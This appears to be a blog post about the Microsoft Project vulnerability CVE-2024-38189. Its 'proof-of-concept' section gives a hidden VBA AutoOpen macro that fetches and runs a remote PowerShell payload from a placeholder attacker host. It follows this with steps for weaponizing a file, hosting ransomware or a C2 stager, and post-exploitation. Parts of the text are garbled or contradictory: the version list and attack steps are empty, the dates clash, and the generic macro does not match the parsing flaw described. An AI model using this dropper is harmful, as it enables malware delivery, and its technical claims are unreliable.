In June 2024, a critical vulnerability was discovered in Microsoft Project, designated as CVE-2024-38189. This flaw allows attackers to achieve Remote Code Execution (RCE) on affected systems—a serious risk for organizations relying on Project for planning and collaboration. In this deep dive, we'll walk you through what CVE-2024-38189 is, how it works, how you can exploit it (for lab and research purposes only), and how to protect your systems.
What is CVE-2024-38189?
CVE-2024-38189 affects Microsoft Project, a popular project management software from Microsoft. The vulnerability exists in the way the application parses certain project files (like .mpp). When a user opens a specially-crafted file, arbitrary code can be executed with the user's permissions—potentially allowing attackers to install malware, steal data, or take full control of the system.
Severity: Critical
CVSS Score: Pending, but likely 8.8+
Affected Versions:
How Does the Vulnerability Work?
The problem lies in unsafe parsing of malicious data within project files. The vulnerable function does not properly validate input, enabling attackers to smuggle executable code inside what looks like a normal .mpp file.
Attack scenario:
The payload executes with user's privileges.
In most cases, delivery happens via phishing emails with a convincing file attachment.
Proof-of-Concept Code (PoC)
*Warning: For educational and authorized testing purposes only. Do not use this on live or production systems.*
Let's demonstrate a simplified method to weaponize a project file by exploiting the vulnerable macro execution feature:
' Place this code in a new Project Macro field
Sub AutoOpen()
Shell "cmd.exe /c powershell -command ""IEX (New-Object Net.WebClient).DownloadString('http://malicious.host/payload.ps1';)""", vbHide
End Sub
An attacker simply embeds a malicious macro into a .mpp file. Once the victim opens the file, the macro runs silently, fetching and executing a remote PowerShell payload.
Note: Microsoft Project typically warns about macros. However, social engineering or chaining with macro security bypass flaws may enable silent execution.
Links to Original References
- Microsoft Security Advisory: CVE-2024-38189
- NIST National Vulnerability Database – CVE-2024-38189
- Microsoft Office Defense Guidance
Create Malicious File
Use project management tools to generate a new .mpp file. Insert the malicious macro above into a macro-enabled field.
Host Payload
The PowerShell command downloads a payload (e.g., ransomware or a C2 stager) from an attacker-controlled server.
User Opens File
If macros are enabled or if macro security is bypassed, AutoOpen triggers and the code runs— silently pulling the secondary payload.
Post-Exploitation
The attacker now has remote access and can proceed to escalate privileges, exfiltrate data, or render the workstation unusable.
Apply Patches!
Microsoft released updates in June 2024. Update Microsoft Project via Windows Update or your organization’s patch management tool.
Conclusion
CVE-2024-38189 is a reminder of how quickly collaboration software can become a liability. Attackers know that business-critical apps like Microsoft Project aren't always patched as quickly as browsers or operating systems. Stay ahead: Patch promptly, train your users, and monitor for abuse of trusted tools.
Stay secure, and keep on planning—safely!
*Written exclusively for you, with easy-to-follow steps and all-new explanations. Share responsibly.*
Timeline
Published on: 08/13/2024 18:15:27 UTC
Last modified on: 08/24/2024 00:06:46 UTC